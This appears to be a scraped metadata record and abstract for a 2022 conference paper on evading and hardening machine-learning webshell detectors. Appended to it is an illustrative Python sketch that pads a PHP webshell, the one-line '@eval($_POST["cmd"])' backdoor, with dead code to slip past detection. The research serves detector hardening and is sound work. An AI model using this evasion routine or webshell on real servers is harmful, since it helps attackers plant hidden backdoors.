{"title":"Adversarial Attack and Defense for Webshell Detection on Machine Learning Models","authors":"Q. Zhang, Lishen Chen, Qiao Yan","doi":"10.1109/CyberC55534.2022.00017","DOIUrl":null,"url":null,"abstract":"Machine learning (ML) models can be used for the automated processing and analysis of source codes, thus improving the detection of webshell malware source codes, which can enhance the security of the whole network. However, despite the successes of ML-based models in webshell detection, these models lack large amounts of data for training and are vulnerable to adversarial examples. We have built a larger and more precise dataset containing 2015 manually labeled webshell malware. A detection model trained with this dataset can achieve higher detection accuracy. We have also proposed a method to generate adversarial examples for the programming language without changing its logic. The main idea of our method is to insert perturbation codes that do not modify the webshell program’s semantics, thereby creating an adversarial example that can bypass the model’s detection. This method can effectively attack the existing webshell malware ML detection models without changing the original malicious functions. Experiments have shown that our method can generate webshell malware adversarial examples that evade model detection while obtaining the model’s confidence output. To defend against such attacks, we have applied retraining and adversarial fine-tuning.","PeriodicalId":234632,"journal":{"name":"2022 International Conference on Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC)","volume":"59 1","pages":"0"},"PeriodicalIF":0.0000,"publicationDate":"2022-10-01","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":"0","resultStr":null,"platform":"Semanticscholar","paperid":null,"PeriodicalName":"2022 International Conference on Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC)","FirstCategoryId":"1085","ListUrlMain":"https://doi.org/10.1109/CyberC55534.2022.00017","RegionNum":0,"RegionCategory":null,"ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":null,"EPubDate":"","PubModel":"","JCR":"","JCRName":"","Score":null,"Total":0}
Citations: 0
Abstract
Machine learning (ML) models can automate the processing and analysis of source code, improving the detection of webshell malware and thereby enhancing the security of the whole network. However, despite their success in webshell detection, ML-based models suffer from a shortage of training data and are vulnerable to adversarial examples. We have built a larger and more precise dataset containing 2,015 manually labeled webshell malware samples; a detection model trained on this dataset achieves higher detection accuracy. We have also proposed a method for generating adversarial examples from source code without changing its program logic. The main idea is to insert perturbation code that does not modify the webshell program's semantics, producing an adversarial example that bypasses the model's detection. This method can effectively attack existing ML-based webshell detection models without altering the original malicious functionality. Experiments show that our method can generate webshell adversarial examples that evade detection, using the model's confidence output as feedback. To defend against such attacks, we apply retraining and adversarial fine-tuning.
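To make the core idea concrete, below is a minimal sketch of a semantics-preserving perturbation of the kind the abstract describes. The paper does not publish its implementation, so everything here is illustrative: the dead-code snippets, the function name `insert_perturbations`, and the line-based insertion strategy are all assumptions, not the authors' method.

```python
import random

# Hypothetical PHP dead-code snippets: each is valid PHP that never affects
# the program's observable behavior (unused assignments, unreachable
# branches, comments). A real attack would choose snippets that shift the
# detector's features as much as possible.
DEAD_CODE_SNIPPETS = [
    '$__pad0 = 0;',
    'if (false) { echo "unreachable"; }',
    '$__pad1 = str_repeat(" ", 1);',
    '/* benign-looking comment inserted as a perturbation */',
]


def insert_perturbations(php_source: str, n_inserts: int = 3, seed: int = 0) -> str:
    """Splice semantics-preserving dead code into a PHP webshell.

    Insertion happens only at line boundaries after the opening <?php tag
    and before any closing ?> tag, so the file stays syntactically valid
    and its logic is untouched.
    """
    rng = random.Random(seed)
    lines = php_source.splitlines()
    # Track the closing tag so no PHP code lands outside the PHP block.
    last = len(lines) - 1 if lines and lines[-1].strip() == "?>" else len(lines)
    for _ in range(n_inserts):
        pos = rng.randint(1, last)  # never insert before the <?php tag
        lines.insert(pos, rng.choice(DEAD_CODE_SNIPPETS))
        last += 1  # the closing tag moved down by one line
    return "\n".join(lines)


if __name__ == "__main__":
    webshell = '<?php\n@eval($_POST["cmd"]);\n?>'
    print(insert_perturbations(webshell))
```

In the black-box setting the abstract suggests, an attacker would repeat such insertions and keep only those that lower the detector's reported confidence, iterating until the sample is classified as benign.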